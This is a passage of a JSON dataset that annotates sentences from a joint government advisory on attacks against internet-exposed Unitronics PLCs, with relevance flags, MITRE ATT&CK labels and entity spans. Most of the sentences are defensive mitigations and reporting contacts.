multiple internet-exposed PLCs", "entities": [ { "text": "Unitronics PLCs", "start": 71, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "internet-exposed PLCs", "start": 129, "end": 150, "label": "Infrastructure_Indicator" }, { "text": "targeted", "start": 111, "end": 119, "label": "Action" }, { "text": "threat actors", "start": 92, "end": 105, "label": "ThreatActor" } ] }, { "uid": "mitre-91_mitre_report-p6-s86-4359b8", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 86, "context_before": "Note: The mitigations below are based on threat actor activity against Unitronics PLCs, but threat actors have targeted multiple internet-exposed PLCs in 2024.1 These mitigations should be applied to any internet-facing PLCs.", "sentence_text": "Network Defenders\n(Updated Dec. 18, 2024)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p6-s87-f2908a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 6, "sentence_id": 87, "context_before": "Network Defenders\n(Updated Dec. 18, 2024)", "sentence_text": "The cyber threat actors accessed the affected devices—Unitronics Vision Series PLCs—by authenticating to internet-connected devices using default or no passwords.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.001", "name": "Default Accounts" } ], "procedure": "authenticate using default/no passwords", "entities": [ { "text": "cyber threat actors", "start": 4, "end": 23, "label": "ThreatActor" }, { "text": "Unitronics Vision Series PLCs", "start": 54, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "authenticating", "start": 87, "end": 101, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p7-s89-375e7f", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 89, "context_before": "", "sentence_text": "Replace all default passwords on PLCs and HMIs with a strong password.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s91-ffbd6b", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 91, "context_before": "[CPG 2.A]", "sentence_text": "In particular, ensure the Unitronics PLC default password is not in use.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s93-64e43f", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 93, "context_before": "", "sentence_text": "Disconnect the PLC from the public-facing internet [CPG 2.X].", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s94-7e2e8d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 94, "context_before": "Disconnect the PLC from the public-facing internet [CPG 2.X].", "sentence_text": "Either disable the capability for remotely programming PLCs or require a strong password for remotely programming the PLC.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s95-27b2b8", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 95, "context_before": "Either disable the capability for remotely programming PLCs or require a strong password for remotely programming the PLC.", "sentence_text": "(Update End)\nFollow-up steps to strengthen security posture:\n Implement multifactor authentication", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s96-a6cd27", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 96, "context_before": "(Update End)\nFollow-up steps to strengthen security posture:\n Implement multifactor authentication", "sentence_text": "[CPG 2.H] for access to the OT network whenever applicable.\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s97-d49f2d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 97, "context_before": "[CPG 2.H] for access to the OT network whenever applicable.\n", "sentence_text": "o A VPN or gateway device can enable multifactor authentication for remote access even if the PLC does not support multifactor authentication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s98-2e25ef", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 98, "context_before": "o A VPN or gateway device can enable multifactor authentication for remote access even if the PLC does not support multifactor authentication.", "sentence_text": "Implement security rules on these higher-level network security mechanisms that prevent the type of repeated and sustained login attempts that would be seen during a brute force attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s99-4b69c5", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 99, "context_before": "Implement security rules on these higher-level network security mechanisms that prevent the type of repeated and sustained login attempts that would be seen during a brute force attack.", "sentence_text": "When possible, implement a device control list for workstations sending messages or connecting to OT components.\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s100-06c325", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 100, "context_before": "When possible, implement a device control list for workstations sending messages or connecting to OT components.\n", "sentence_text": "Keep Unitronics and other PLC devices updated with the latest software patches by the manufacturer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s102-22c699", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 102, "context_before": "", "sentence_text": "Confirm third-party vendors apply the above recommended countermeasures to mitigate exposure of these devices and all installed equipment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s104-b06b73", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 104, "context_before": "(Updated Dec. 18, 2024)\n", "sentence_text": "Implement network segmentation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s106-81e83c", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 106, "context_before": "", "sentence_text": "Periodically inventory internet accessible devices [CPG 1.A] to identify any unexpected devices connected to the network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s108-70ce9f", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 108, "context_before": "", "sentence_text": "Configure external and internal firewalls to block traffic using common ports associated with network protocols that are unnecessary for the particular network segment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p7-s109-4b0bcc", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 7, "sentence_id": 109, "context_before": "Configure external and internal firewalls to block traffic using common ports associated with network protocols that are unnecessary for the particular network segment.", "sentence_text": "Page 7 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s110-c3e135", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 110, "context_before": "Page 7 of 11 | Product ID: AA23-335A TLP:CLEAR", "sentence_text": "o Centralized authentication techniques can help manage the large number of field controller accounts needed across the industrial control system (ICS).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s113-9ee891", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 113, "context_before": "", "sentence_text": "Use a role-based mechanism to limit operating mode changes to required authenticated users only.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s114-e2720b", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 114, "context_before": "Use a role-based mechanism to limit operating mode changes to required authenticated users only.", "sentence_text": "o Physical mechanisms (e.g., keys) can also be used to prevent unauthorized operating mode changes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s116-c6749e", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 116, "context_before": "", "sentence_text": "Implement device management systems that can authenticate all network messages to prevent unauthorized system changes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s118-f6d15e", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 118, "context_before": "", "sentence_text": "Ensure all field controllers require users to authenticate for all management sessions.\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s119-9e87cb", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 119, "context_before": "Ensure all field controllers require users to authenticate for all management sessions.\n", "sentence_text": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems and ensure they can only connect with known workstations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s121-ff4fbd", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 121, "context_before": "", "sentence_text": "Implement network intrusion detection and prevention systems whenever possible to identify malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s122-70bcb9", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 122, "context_before": "Implement network intrusion detection and prevention systems whenever possible to identify malicious activity.", "sentence_text": "o Use this to monitor for logon activity for unexpected or unusual access to devices from the internet.[11]\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s123-a5762b", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 123, "context_before": "o Use this to monitor for logon activity for unexpected or unusual access to devices from the internet.[11]\n", "sentence_text": "Retain cold-standby or replacement hardware of similar models to ensure continued operations of critical functions if the primary system is compromised or unavailable [CPG 2.R].[12]\no Create and test strong backups of the logic and configurations of PLCs to enable fast recovery.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s126-d5756a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 126, "context_before": "", "sentence_text": "Monitor asset management systems for device configuration changes, which can be used to understand expected parameter settings.\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s127-952746", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 127, "context_before": "Monitor asset management systems for device configuration changes, which can be used to understand expected parameter settings.\n", "sentence_text": "Monitor the content of network traffic for the following:\no", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s128-f4f8dc", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 128, "context_before": "Monitor the content of network traffic for the following:\no", "sentence_text": "Unusual logins to internet-connected devices or unexpected protocols to/from the internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s129-aecbf2", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 129, "context_before": "Unusual logins to internet-connected devices or unexpected protocols to/from the internet.", "sentence_text": "o Functions of ICS management protocols that change an asset’s operating mode or modify programs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s130-e4dbd3", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 130, "context_before": "o Functions of ICS management protocols that change an asset’s operating mode or modify programs.", "sentence_text": "o Unexpected protocols connected to ports that are mismatched with the protocols that would normally connect to these ports.[11] Block all non-used high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [CPG 2.V].", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s132-a58cc2", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 132, "context_before": "(Update End)", "sentence_text": "In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, as well as reduce the impact and risk of compromise by cyber threat actors:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p8-s133-94897c", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 8, "sentence_id": 133, "context_before": "In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, as well as reduce the impact and risk of compromise by cyber threat actors:", "sentence_text": "Page 8 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s134-6fced3", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 134, "context_before": "Page 8 of 11 | Product ID: AA23-335A TLP:CLEAR", "sentence_text": "Reduce risk exposure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s135-f59d61", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 135, "context_before": "Reduce risk exposure.", "sentence_text": "CISA Cyber Hygiene services can help provide additional review of organizations’ internet accessible assets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s136-6cfc0a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 136, "context_before": "CISA Cyber Hygiene services can help provide additional review of organizations’ internet accessible assets.", "sentence_text": "Email vulnerability@cisa.dhs.gov with the subject line “Requesting Cyber Hygiene Services” to get started.\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s137-decef8", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 137, "context_before": "Email vulnerability@cisa.dhs.gov with the subject line “Requesting Cyber Hygiene Services” to get started.\n", "sentence_text": "(Updated Dec. 18, 2024)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s138-abc088", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 138, "context_before": "(Updated Dec. 18, 2024)", "sentence_text": "U.K. organizations can sign up for the free NCSC Early Warning service to receive email alerts tailored to the cyber threat for your organization’s IP address.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s139-e58633", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 139, "context_before": "U.K. organizations can sign up for the free NCSC Early Warning service to receive email alerts tailored to the cyber threat for your organization’s IP address.", "sentence_text": "(End Update)\nDevice Manufacturers", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s140-cf997d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 140, "context_before": "(End Update)\nDevice Manufacturers", "sentence_text": "Although critical infrastructure organizations using Unitronics (including rebranded Unitronics) PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products that are secure by design and default.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s141-535bd5", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 141, "context_before": "Although critical infrastructure organizations using Unitronics (including rebranded Unitronics) PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products that are secure by design and default.", "sentence_text": "The authoring agencies urge device manufacturers to take ownership of their customers’ security outcomes by following the principles in the joint guide Shifting the Balance of Cybersecurity Risk:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s142-9ee71d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 142, "context_before": "The authoring agencies urge device manufacturers to take ownership of their customers’ security outcomes by following the principles in the joint guide Shifting the Balance of Cybersecurity Risk:", "sentence_text": " (Updated Dec. 18, 2024)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s143-84f8c7", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 143, "context_before": " (Updated Dec. 18, 2024)", "sentence_text": "Change the manufacturers’ default settings to prevent exposing administrative interfaces to the internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s144-368e2c", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 144, "context_before": "Change the manufacturers’ default settings to prevent exposing administrative interfaces to the internet.", "sentence_text": "(End Update)\n Do not charge additional fees for basic security features needed to operate the product securely.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s146-f20b83", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 146, "context_before": "", "sentence_text": "Support multifactor authentication, including via phishing-resistant methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s147-a49877", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 147, "context_before": "Support multifactor authentication, including via phishing-resistant methods.", "sentence_text": "For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s148-1a46f3", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 148, "context_before": "For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations.", "sentence_text": "For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s149-249ae2", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 149, "context_before": "For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.", "sentence_text": "The authoring agencies recommend testing any existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s150-226a7d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 150, "context_before": "The authoring agencies recommend testing any existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.", "sentence_text": "To get started:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s151-c3dee1", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 151, "context_before": "To get started:\n1.", "sentence_text": "Select an ATT&CK technique described in this advisory (see Table 1 through Table 4).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s152-b4724e", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 152, "context_before": "Select an ATT&CK technique described in this advisory (see Table 1 through Table 4).", "sentence_text": "2. Align your security technologies against the technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s153-a15930", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 153, "context_before": "2. Align your security technologies against the technique.", "sentence_text": "3. Test your technologies against the technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s154-2bca10", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 154, "context_before": "3. Test your technologies against the technique.", "sentence_text": "4. Analyze your detection and prevention technologies’ performance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s155-fb8d02", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 155, "context_before": "4. Analyze your detection and prevention technologies’ performance.", "sentence_text": "5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p9-s156-8a6c43", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 9, "sentence_id": 156, "context_before": "5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.", "sentence_text": "Page 9 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s158-325435", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 158, "context_before": "Resources\n", "sentence_text": "EPA: Cybersecurity for the Water Sector ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s160-4902d1", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 160, "context_before": "CISA:", "sentence_text": "Water and Wastewater Systems Sector ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s161-1dd223", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 161, "context_before": "Water and Wastewater Systems Sector ", "sentence_text": "CISA Alert: Exploitation of Unitronics PLCs used in Water and Wastewater Systems  CISA:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s162-1da81a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 162, "context_before": "CISA Alert: Exploitation of Unitronics PLCs used in Water and Wastewater Systems  CISA:", "sentence_text": "Iran Cyber Threat Overview and Advisories ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s163-562e88", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 163, "context_before": "Iran Cyber Threat Overview and Advisories ", "sentence_text": "FBI: The Iran Threat  CISA, MITRE: Best Practices for MITRE ATT&CK Mapping ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s165-fcbcba", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 165, "context_before": "CISA:", "sentence_text": "Decider Tool  CISA:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s166-8fe68c", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 166, "context_before": "Decider Tool  CISA:", "sentence_text": "Cross-Sector Cybersecurity Performance Goals  CISA:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s167-643f1b", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 167, "context_before": "Cross-Sector Cybersecurity Performance Goals  CISA:", "sentence_text": "Cyber Hygiene Services  CISA: Shifting the Balance of Cybersecurity Risk - Principles and Approaches for Secure by Design Software ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s168-73fac7", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 168, "context_before": "Cyber Hygiene Services  CISA: Shifting the Balance of Cybersecurity Risk - Principles and Approaches for Secure by Design Software ", "sentence_text": "CISA: Secure by Design Alert - How Software Manufacturers Can Shield Web Management Interfaces from Malicious Cyber Activity  CISA, NSA: NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s169-d6e20d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 169, "context_before": "CISA: Secure by Design Alert - How Software Manufacturers Can Shield Web Management Interfaces from Malicious Cyber Activity  CISA, NSA: NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations ", "sentence_text": "CISA: Secure by Design and Default  CCCS:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s170-f16275", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 170, "context_before": "CISA: Secure by Design and Default  CCCS:", "sentence_text": "Cyber Security Readiness Goals: Securing Our Most Critical Systems References", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s171-275608", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 171, "context_before": "Cyber Security Readiness Goals: Securing Our Most Critical Systems References", "sentence_text": "[1] Dark Reading: Pro-Iranian Attackers Claim to Target Israeli Railroad Network", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s172-95c743", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 172, "context_before": "[1] Dark Reading: Pro-Iranian Attackers Claim to Target Israeli Railroad Network", "sentence_text": "[2] Industrial Cyber: Digital Battlegrounds - Evolving Hybrid Kinetic Warfare", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s173-054a7a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 173, "context_before": "[2] Industrial Cyber: Digital Battlegrounds - Evolving Hybrid Kinetic Warfare", "sentence_text": "[3] Bleeping Computer: Israel’s Largest Oil Refinery Website Offline After DDoS Attack", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s174-4e0ac6", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 174, "context_before": "[3] Bleeping Computer: Israel’s Largest Oil Refinery Website Offline After DDoS Attack", "sentence_text": "[4] Dark Reading: Website of Israeli Oil Refinery Taken Offline by Pro-Iranian Attackers [5] X: @CyberAveng3rs", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p10-s176-e1de32", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 10, "sentence_id": 176, "context_before": "[6] MITRE:", "sentence_text": "[9] Dragos: The Rising Tide of Water Utility Cyber Threats: How Dragos Shield Water Systems [10] Claroty: From Exploits to Forensics: Unraveling the Unitronics Attack", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s177-c93caa", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 177, "context_before": "[9] Dragos: The Rising Tide of Water Utility Cyber Threats: How Dragos Shield Water Systems [10] Claroty: From Exploits to Forensics: Unraveling the Unitronics Attack", "sentence_text": "[12] M. Rentschler and H. Heine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s178-3eee28", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 178, "context_before": "[12] M. Rentschler and H. Heine.", "sentence_text": "The Parallel Redundancy Protocol for Industrial IP Networks Incident Reporting Contact Information U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:\n CISA via CISA’s 24/7 Operations Center (SayCISA@cisa.gov or 884-729-2472) or your local FBI field office.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s179-3c5595", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 179, "context_before": "The Parallel Redundancy Protocol for Industrial IP Networks Incident Reporting Contact Information U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:\n CISA via CISA’s 24/7 Operations Center (SayCISA@cisa.gov or 884-729-2472) or your local FBI field office.", "sentence_text": "For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s180-b8115d", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 180, "context_before": "For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.\n", "sentence_text": "State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s181-7b8a67", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 181, "context_before": "State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).", "sentence_text": "Canadian organizations are encouraged to report incidents by emailing CCCS at contact@cyber.gc.ca.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s182-fc4e2b", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 182, "context_before": "Canadian organizations are encouraged to report incidents by emailing CCCS at contact@cyber.gc.ca.", "sentence_text": "U.K. organizations are encouraged to report incidents to https://report.ncsc.gov.uk/ (monitored 24 hours).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s183-cdd0ce", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 183, "context_before": "U.K. organizations are encouraged to report incidents to https://report.ncsc.gov.uk/ (monitored 24 hours).", "sentence_text": "Disclaimer\nThe information in this report is being provided “as is” for informational purposes only.", "relevant": "no", 